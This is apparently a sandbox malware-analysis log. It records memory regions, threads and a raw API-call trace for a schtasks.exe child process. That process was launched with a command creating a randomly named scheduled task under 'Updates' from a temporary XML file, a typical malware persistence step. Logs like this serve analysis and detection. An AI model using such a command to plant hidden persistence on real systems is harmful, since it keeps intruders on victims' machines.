region_type = mapped_file
name = "system.directoryservices.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\system.directoryservices.ni.dll")
Region:
id = 2164
start_va = 0x74a10000
end_va = 0x74a12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-xstate-l2-1-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll")
Region:
id = 2165
start_va = 0x74980000
end_va = 0x74a08fff
monitored = 1
entry_point = 0x74981130
region_type = mapped_file
name = "clrjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")
Region:
id = 2166
start_va = 0x400000
end_va = 0x40ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2167
start_va = 0x410000
end_va = 0x41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2172
start_va = 0x6f750000
end_va = 0x6f7a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.security.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\fbf36f7901fec6a367af3bc05a96b929\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p6f792626#\\fbf36f7901fec6a367af3bc05a96b929\\microsoft.powershell.security.ni.dll")
Thread:
id = 10
os_tid = 0xfcc
Thread:
id = 14
os_tid = 0x818
Thread:
id = 15
os_tid = 0x814
Thread:
id = 16
os_tid = 0x324
Thread:
id = 22
os_tid = 0x758
Thread:
id = 23
os_tid = 0x75c
Thread:
id = 24
os_tid = 0x48c
Thread:
id = 25
os_tid = 0x6f8
Thread:
id = 26
os_tid = 0x428
Thread:
id = 27
os_tid = 0x7cc
Thread:
id = 28
os_tid = 0x85c
Thread:
id = 35
os_tid = 0x7b8
Thread:
id = 37
os_tid = 0xd10
Thread:
id = 38
os_tid = 0x950
Process:
id = "3"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x3d361000"
os_pid = "0xfdc"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xf60"
cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\nFxIoujoILCO\" /XML \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1489
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1490
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1491
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1492
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1493
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1494
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1495
start_va = 0x140000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1496
start_va = 0x770000
end_va = 0x79dfff
monitored = 1
entry_point = 0x787683
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 1497
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1498
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1499
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1500
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1501
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1502
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1503
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1504
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1505
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1506
start_va = 0x180000
end_va = 0x23ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1507
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1508
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1509
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1510
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1511
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1512
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1513
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1514
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1515
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1516
start_va = 0x240000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 1517
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1518
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1519
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1520
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1521
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1533
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1534
start_va = 0x380000
end_va = 0x3e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1535
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1536
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1537
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1538
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1539
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1540
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1541
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1542
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1543
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1544
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1545
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1546
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1547
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1548
start_va = 0x74920000
end_va = 0x74928fff
monitored = 0
entry_point = 0x74921830
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll")
Region:
id = 1549
start_va = 0x3f0000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 1550
start_va = 0x480000
end_va = 0x607fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1551
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1552
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1553
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1554
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1555
start_va = 0x7a0000
end_va = 0x920fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 1556
start_va = 0x930000
end_va = 0x1d2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000930000"
filename = ""
Region:
id = 1557
start_va = 0x70000
end_va = 0x81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 1565
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1566
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1567
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1568
start_va = 0x1d30000
end_va = 0x1ffefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1573
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1574
start_va = 0xe0000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1577
start_va = 0x610000
end_va = 0x6eefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 1580
start_va = 0x6f0000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 1581
start_va = 0x2150000
end_va = 0x218ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 1582
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1583
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1584
start_va = 0x100000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1585
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1586
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1587
start_va = 0x6ad20000
end_va = 0x6ad9cfff
monitored = 0
entry_point = 0x6ad2166a
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 11
os_tid = 0xfe0
[0153.978] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xdfb38 | out: lpSystemTimeAsFileTime=0xdfb38*(dwLowDateTime=0xd687b460, dwHighDateTime=0x1d8a8be))
[0153.978] GetCurrentProcessId () returned 0xfdc
[0153.978] GetCurrentThreadId () returned 0xfe0
[0153.978] GetTickCount () returned 0x166c93e
[0153.978] RtlQueryPerformanceCounter () returned 0x1
[0153.978] GetModuleHandleA (lpModuleName=0x0) returned 0x770000
[0153.978] __set_app_type (_Type=0x1)
[0153.979] __p__fmode () returned 0x754b31f4
[0153.979] __p__commode () returned 0x754b31fc
[0153.979] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x787881) returned 0x0
[0153.980] __wgetmainargs (in: _Argc=0x799e6c, _Argv=0x799e74, _Env=0x799e70, _DoWildCard=0, _StartInfo=0x799e80 | out: _Argc=0x799e6c, _Argv=0x799e74, _Env=0x799e70) returned 0
[0153.981] _onexit (_Func=0x790fe2) returned 0x790fe2
[0153.981] _onexit (_Func=0x790ff3) returned 0x790ff3
[0153.981] _onexit (_Func=0x791002) returned 0x791002
[0153.981] _onexit (_Func=0x79101e) returned 0x79101e
[0153.981] _onexit (_Func=0x79103a) returned 0x79103a
[0153.982] _onexit (_Func=0x791056) returned 0x791056
[0153.982] _onexit (_Func=0x791072) returned 0x791072
[0153.982] _onexit (_Func=0x79108e) returned 0x79108e
[0153.982] _onexit (_Func=0x7910aa) returned 0x7910aa
[0153.982] _onexit (_Func=0x7910c6) returned 0x7910c6
[0153.982] _onexit (_Func=0x7910e2) returned 0x7910e2
[0153.982] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0153.983] WinSqmIsOptedIn () returned 0x0
[0153.983] GetProcessHeap () returned 0x280000
[0153.983] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x28f0a0
[0153.983] SetLastError (dwErrCode=0x0)
[0153.983] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0153.983] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0153.983] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0153.983] VerifyVersionInfoW (in: lpVersionInformation=0xdf5b0, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0xdf5b0) returned 1
[0153.983] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294bf0
[0153.984] lstrlenW (lpString="") returned 0
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x2) returned 0x294fd8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x294fe8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c08
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295008
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295028
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295048
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295068
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c20
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295088
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2950a8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2950c8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2950e8
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c38
[0153.984] GetProcessHeap () returned 0x280000
[0153.984] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295108
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295128
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295160
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295180
[0153.985] SetThreadUILanguage (LangId=0x0) returned 0x409
[0153.985] SetLastError (dwErrCode=0x0)
[0153.985] GetProcessHeap () returned 0x280000
[0153.985] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2951a0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2951c0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2951e0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295200
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295220
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294c50
[0153.986] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.986] GetProcessHeap () returned 0x280000
[0153.986] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x208) returned 0x295ac8
[0153.986] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x295ac8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0153.987] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x733a0000
[0153.989] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x733a19d9
[0153.989] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0153.989] GetProcessHeap () returned 0x280000
[0153.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x74e) returned 0x295cd8
[0153.990] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoW") returned 0x733a19f4
[0153.990] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x295cd8 | out: lpData=0x295cd8) returned 1
[0153.990] GetProcAddress (hModule=0x733a0000, lpProcName="VerQueryValueW") returned 0x733a1b51
[0153.990] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf6b8, puLen=0xdf6bc | out: lplpBuffer=0xdf6b8*=0x296074, puLen=0xdf6bc) returned 1
[0153.994] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.994] _vsnwprintf (in: _Buffer=0x295ac8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf6a0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0153.994] VerQueryValueW (in: pBlock=0x295cd8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf6c8, puLen=0xdf6c4 | out: lplpBuffer=0xdf6c8*=0x295ea0, puLen=0xdf6c4) returned 1
[0153.994] lstrlenW (lpString="schtasks.exe") returned 12
[0153.994] lstrlenW (lpString="schtasks.exe") returned 12
[0153.994] lstrlenW (lpString=".EXE") returned 4
[0153.994] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0153.995] lstrlenW (lpString="schtasks.exe") returned 12
[0153.995] lstrlenW (lpString=".EXE") returned 4
[0153.995] _memicmp (_Buf1=0x294c50, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.995] lstrlenW (lpString="schtasks") returned 8
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295260
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295280
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2952a0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2952c0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x10) returned 0x294cb0
[0153.996] _memicmp (_Buf1=0x294cb0, _Buf2=0x771ed8, _Size=0x7) returned 0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0xa0) returned 0x2966b8
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x2952e0
[0153.996] GetProcessHeap () returned 0x280000
[0153.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x14) returned 0x295300
[0153.996] GetProcessHeap () returned 0x280000
